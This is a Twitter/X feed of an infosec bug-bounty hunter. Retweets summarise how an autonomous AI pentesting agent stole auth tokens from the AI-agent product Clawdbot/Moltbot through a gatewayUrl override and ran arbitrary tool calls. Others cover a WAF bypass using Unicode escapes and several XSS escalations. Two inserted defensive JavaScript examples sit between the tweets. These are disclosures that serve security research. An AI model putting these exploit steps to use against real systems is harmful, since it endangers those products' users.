Hugo Ferreira @4Meanings
4.1K posts

Infosec as a job. Bug Bounties as a hobby. Stand-Up Comedy as a pleasure.

Joined March 2015
471 Following, 143 Followers

Pinned Tweet
Hugo Ferreira @4Meanings:
As the great Solnado used to say, "Do the favour of being happy!"
Hugo Ferreira retweeted
Valerio Brussani @val_brux:
Yesterday, we wrapped up our Q1 @Hacker0x01 Italy vs. Portugal hacking competition with an in-person day in Porto 🇵🇹 It was a great day of hacking together and connecting with the local community. Looking forward to the next one! #BugBounty
Hugo Ferreira retweeted
Illex @pcuco92:
JavaScript files are a goldmine, but only if you can read them. 💎 JXScout v2 by @fneves97 takes client-side hacking to the next level:
- Advanced source map reversal
- Improved chunk discovery
- AST-based vulnerability analysis
Check it out on GitHub 👇
Hugo Ferreira retweeted
Harley Kimball @infinitelogins:
In a demo by @Ethiack, their Hackian AI agent achieved RCE on Clawdbot/Moltbot in under 2 hours. It abused public JS source maps to learn the WebSocket protocol, then used a gatewayUrl override (which controls where the UI connects) to steal auth tokens from the initial WebSocket connect message and run arbitrary tool calls. Full details 👇 ethiack.com/news/blog/one-… #BugBounty
Hugo Ferreira retweeted
Ethiack @ethiack:
Our Co-founder, André Baptista (@0xacb) was interviewed by Expresso Magazine during the Now Next NOS Summit about how AI is changing the rules of business and work for Portuguese companies. Check out the full article 👇 expresso.pt/iniciativasepr…
Hugo Ferreira retweeted
André Baptista @0xacb:
🚨We found RCE in Clawdbot 🚨 If you're using Clawdbot/Moltbot, I can get RCE on your computer just by getting you to click a link.

The coolest part? This vulnerability (CVE-2026-25253) took only 100 minutes to discover, and it was discovered completely autonomously using @Ethiack's AI pentesting solution "Hackian". Here's how it went down 👇

We set Hackian against Clawdbot, purely blackbox. It discovered that the Control UI stores the gateway auth token in localStorage and builds the first WebSocket connect frame from it on load.

Hackian discovered that the UI also accepts "gatewayUrl" via query params: /chat?gatewayUrl=wss://attacker. This overrides the saved gateway and auto connects 😏

On first load, the UI immediately opens a WebSocket to the attacker URL and sends the token! Think that's cool? Wait until you see how it upgraded this to a full RCE for local Clawdbot systems. Read the deets 👇 ethiack.com/news/blog/one-…
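The check that the gatewayUrl override described in this thread is missing, written from the defender's side as an added example (not Clawdbot/Moltbot or Ethiack code); the allowlisted origins, the 8080 port and the connect-frame shape are assumed placeholders:

```javascript
// Added example, not Clawdbot/Moltbot or Ethiack code. A gateway URL taken from
// ?gatewayUrl= must be limited to trusted origins before the UI opens a socket
// and sends the auth token it keeps in localStorage.

// Origins the Control UI may connect to. Constructed placeholder values.
const ALLOWED_GATEWAY_ORIGINS = new Set([
  "ws://127.0.0.1:8080",            // assumed local gateway port
  "wss://gateway.example.invalid",  // assumed hosted gateway
]);

/**
 * Decide which gateway URL the UI should connect to on load.
 * Returns the saved gateway when no override is present, the override when it
 * points at a trusted origin, and null (do not connect) otherwise.
 * @param {string} queryString  location.search, e.g. "?gatewayUrl=wss://..."
 * @param {string} savedGateway gateway persisted from a previous session
 */
function resolveGatewayUrl(queryString, savedGateway) {
  const override = new URLSearchParams(queryString).get("gatewayUrl");
  if (override === null) return savedGateway;
  let url;
  try {
    url = new URL(override);
  } catch {
    return null; // unparsable: refuse rather than fall back silently
  }
  if (url.protocol !== "ws:" && url.protocol !== "wss:") return null;
  // Compare the parsed origin, not a string prefix: "wss://trusted@evil" and
  // "wss://trusted.evil" both pass a prefix check but have a different origin.
  if (!ALLOWED_GATEWAY_ORIGINS.has(url.origin)) return null;
  return url.href;
}

/**
 * Build the first connect frame only once a gateway has been resolved, so the
 * token is never attached to a frame destined for an untrusted URL.
 * (Frame shape is an assumption for this example.)
 */
function buildConnectFrame(queryString, savedGateway, token) {
  const gateway = resolveGatewayUrl(queryString, savedGateway);
  if (gateway === null) return null;
  return { url: gateway, frame: { type: "connect", token } };
}
```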
Hugo Ferreira retweeted
Harley Kimball @infinitelogins:
In Salesforce Commerce Cloud, @castilho101 found XSS where a JSON parameter gets rendered into HTML. Cloudflare WAF blocked his payloads, so he encoded characters as Unicode escapes (\u0073 for 's'). The WAF sees raw Unicode and allows it, but JSON.parse() on the server decodes it back into working JavaScript, letting him exfiltrate OAuth tokens for account takeover. Full write-up 👇 castilho.sh/salesforce-oau… #BugBounty
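The mismatch described above, shown as an added example (not Salesforce or Cloudflare code): the same JSON parameter inspected once as raw text and once after JSON.parse, which is the view a filter in front of such a parameter needs; the regex and the sample values are constructed:

```javascript
// Added example, not Salesforce or Cloudflare code. A filter in front of a
// JSON-carrying parameter must inspect the decoded value: a matcher that only
// sees the raw request text misses \u escapes that JSON.parse turns back into
// markup before the server renders it.

// Markup worth flagging in a value that ends up in HTML (constructed, illustrative).
const DANGEROUS_HTML = /<\s*\/?\s*(script|img|svg|iframe)\b|\bon\w+\s*=/i;

// What a matcher sees on the wire: the raw parameter, escapes and all.
function rawLooksDangerous(rawParam) {
  return DANGEROUS_HTML.test(rawParam);
}

// What the application sees: the parsed JSON, with every string value checked,
// nested objects and arrays included.
function decodedLooksDangerous(rawParam) {
  let value;
  try {
    value = JSON.parse(rawParam);
  } catch {
    return false; // not JSON at all; the JSON code path will not render it
  }
  return anyString(value, (s) => DANGEROUS_HTML.test(s));
}

// Walk a parsed JSON value and report whether any string satisfies pred.
function anyString(node, pred) {
  if (typeof node === "string") return pred(node);
  if (Array.isArray(node)) return node.some((n) => anyString(n, pred));
  if (node !== null && typeof node === "object") {
    return Object.values(node).some((n) => anyString(n, pred));
  }
  return false;
}

// Constructed sample in the shape the tweet describes: "s" written as \u0073.
const SAMPLE_PARAM = '{"name":"<\\u0073cript>alert(1)</\\u0073cript>"}';
```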
Hugo Ferreira @4Meanings:
Everyone's talking about AI vs Humans?... What about... AI vs AI? ... Well... our curious research team asked that question... and it resulted in this amazing blog post. Our Hackian is growing so well! Give it a look!
Quoted tweet from Ethiack @ethiack:
Hackian just uncovered a high-severity vulnerability and achieved 1-click RCE in @openclaw (previously Clawdbot), fully autonomously, in under 2 hours. We explain how and show you Hackian’s thought process in our latest blog: ethiack.com/news/blog/one-…
Hugo Ferreira retweeted
arete @aretekzs:
Recently, during an engagement, I encountered a self-XSS. The target used HttpOnly cookies, and none of the pages were iframable. If you are interested, this is how I managed to escalate it: aretekzs.com/posts/from-sel…
Hugo Ferreira retweeted
Ethiack @ethiack:
This week two massive CVEs affecting React and Next.js were released, with massive repercussions. CVE-2025-55182 and CVE-2025-66478 are critical unauthenticated RCE vulnerabilities affecting even default configurations. After the CVE was announced, we've begun working on a testing module, and we've started testing customers today. If you use React or Next.js, please upgrade to a hardened release immediately.
Hugo Ferreira retweeted
Ethiack @ethiack:
Catch the Ethiack team at #Bsides Lisbon! 🤝 We're on site today and tomorrow. If you're attending, drop us a comment so we can connect!👇
Hugo Ferreira retweeted
Ethiack @ethiack:
Don't miss out! Our AI Scientist, Pedro Conde, will be delivering a keynote on "Hacking with AI" at the Mobile App Security Conference (#AppSec). He will talk about how we at Ethiack are exploring the use of fully autonomous "hackbots" - agentic AI systems designed for penetration testing.
🕓 When: November 3rd, 16:00 (CET)
Our team will be at AppSec Prague, November 3-4. Let's connect and discuss application security and AI hacking.
Hugo Ferreira retweeted
castilho @castilho101:
I found out that you can use "ftp::" to convert a limited DOM Clobbering situation into a full CSPT. Then, while talking about it with @LooseSecurity, he found that we can also use "https::". This can be used to prevent URL parsing of href, allowing us to hit other endpoints.
Hugo Ferreira retweeted
castilho @castilho101:
Some mini research I did about escalating an XSS using 414 and 431 server size limit errors, and how I escalated an XSS to account takeover using a Salesforce URL Limit Gadget on an e-commerce website. Hope you enjoy it: castilho.sh/scream-until-e…
Hugo Ferreira retweeted
Ethiack @ethiack:
We've got a new logo mark. ✨
Hugo Ferreira retweeted
Ethiack @ethiack:
You’re about to see the world’s first show & tell from a hackbot. Enjoy!
Hugo Ferreira retweeted
André Baptista @0xacb:
If you look at the AI-generated code below, you may notice that path traversal is prevented via basename functions. Can you still exploit it? Try here 👉 ai4eh.ethiack.ninja